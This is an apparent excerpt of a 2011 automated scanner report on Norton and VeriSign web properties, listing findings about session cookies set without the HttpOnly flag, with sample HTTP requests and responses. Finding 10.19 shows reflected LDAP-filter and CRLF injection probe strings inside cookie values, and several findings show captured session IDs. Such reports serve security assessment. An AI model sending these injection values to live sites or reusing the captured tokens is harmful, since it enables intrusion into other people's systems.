10.6. http://buy.norton.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.11. http://buy.norton.com/estore/mf/landingProductFeatures previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/landingProductFeatures

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.12. http://buy.norton.com/estore/mf/landingPromotion previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/landingPromotion

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingPromotion HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.13. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.14. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.15. http://buy.norton.com/estore/mf/upgradeCenter previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/upgradeCenter

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeCenter HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.16. http://buy.norton.com/estore/mf/upgradeRenewal previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/upgradeRenewal

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.18. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.19. http://buy.norton.com/upgrades-renewals previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/upgrades-renewals

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=vxdTTqHVp98yyfVwX91lmbQpnYvxnzf3hLdx0n14FYn99LpNvJgb!-50551110; path=/
FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /upgrades-renewals HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=0519b9aa-f875-4235-8757-656f0af7db991315604245144
Set-Cookie: JSESSIONID=vxdTTqHVp98yyfVwX91lmbQpnYvxnzf3hLdx0n14FYn99LpNvJgb!-50551110; path=/
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 397

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/up
...[SNIP]...

10.20. https://idprotect.verisign.com/toolbar/activate.v previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/toolbar/activate.v

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.21. http://m.verisign.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://m.verisign.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: m.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 22:03:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2; Path=/
Location: http://m.verisign.com/home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2
Content-Length: 0
Content-Type: text/html

10.22. http://mbox3.offermatica.com/m2/verisign/mbox/standard previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.23. https://onlinefamily.norton.com/familysafety/loginStart.fs previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://onlinefamily.norton.com
Path:	/familysafety/loginStart.fs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
formVersion=1315604755623; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.24. https://products.verisign.com/geocenter/reseller/doregister.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://products.verisign.com
Path:	/geocenter/reseller/doregister.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=BLTnTqJKyGPctfv1FdlqcJ70S5h6p0Gvlmy4hN8gznRX5SWKqb6t!1264420788; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /geocenter/reseller/doregister.do HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:46:18 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=BLTnTqJKyGPctfv1FdlqcJ70S5h6p0Gvlmy4hN8gznRX5SWKqb6t!1264420788; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 8588

<html>
<head>

<title>Referring Partner Code Error</title>
<link href="/geocenter/style.css" type=text/css rel="stylesheet">
<style type=
...[SNIP]...

10.25. https://products.verisign.com/geocenter/reseller/logon.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://products.verisign.com
Path:	/geocenter/reseller/logon.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=JLFcTqJFrTLDMrnDfsKJpnM1TKGWGdMnR63n8jNnvndRhmkDzJCZ!1264420788; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /geocenter/reseller/logon.do HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:46:13 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=JLFcTqJFrTLDMrnDfsKJpnM1TKGWGdMnR63n8jNnvndRhmkDzJCZ!1264420788; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...

10.26. https://products.verisign.com/geocenter/reseller/register.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://products.verisign.com
Path:	/geocenter/reseller/register.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=LFLdTqJKs7gRRpXLyKDGZh0GycTV9zGf0v1HCZvtSZfhRmTRGJC2!1264420788; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /geocenter/reseller/register.do?vatCountry= HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:46:18 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=LFLdTqJKs7gRRpXLyKDGZh0GycTV9zGf0v1HCZvtSZfhRmTRGJC2!1264420788; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 8588

<html>
<head>

<title>Referring Partner Code Error</title>
<link href="/geocenter/style.css" type=text/css rel="stylesheet">
<style type=
...[SNIP]...

10.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/outsideSearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/outsideSearch HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.28. https://securitycenter.verisign.com/celp/enroll/retail previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/retail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.29. https://securitycenter.verisign.com/celp/enroll/upsell previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/upsell

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.30. https://trust-center.verisign.com/process/retail/session_timeout previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://trust-center.verisign.com
Path:	/process/retail/session_timeout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure
TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.31. http://us.norton.com/beta/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://us.norton.com
Path:	/beta/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beta/index.jsp?inid=us_hho_homepage_hero4_2012beta HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.32. http://us.norton.com/beta/overview.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://us.norton.com
Path:	/beta/overview.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=FA523A7AE741FCDE2CC540690D11D77A; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beta/overview.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Expires: Fri, 09 Sep 2011 21:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:47:30 GMT
Connection: close
Set-Cookie: JSESSIONID=FA523A7AE741FCDE2CC540690D11D77A; Path=/

10.33. http://vipmobile.verisign.com/fpa/fpa.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/fpa/fpa.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=65DC06BE96553669FB720DFCD04F8421.tomcat2; Path=/fpa

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fpa/fpa.jsp HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=65DC06BE96553669FB720DFCD04F8421.tomcat2; Path=/fpa
Content-Type: text/javascript
Content-Length: 108420

var urlProtocol = ('https:' == document.location.protocol ? 'https://' : 'http://');

// Customizable variables
var hostUri = urlProtocol + "vipmobile.verisign.com/fpa";
var cookieDomain = '.v
...[SNIP]...

10.34. http://vipmobile.verisign.com/images/b_shadow.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/b_shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=806370F1B7465CBED58C1BE853F86CDD.tomcat2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/b_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
